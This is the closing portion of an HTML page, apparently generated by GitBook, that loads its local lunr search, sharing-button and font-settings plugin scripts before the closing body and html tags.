        <script src="gitbook/gitbook-plugin-lunr/lunr.min.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-lunr/search-lunr.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-sharing/buttons.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-fontsettings/fontsettings.js"></script>
        
    

    </body>
</html>

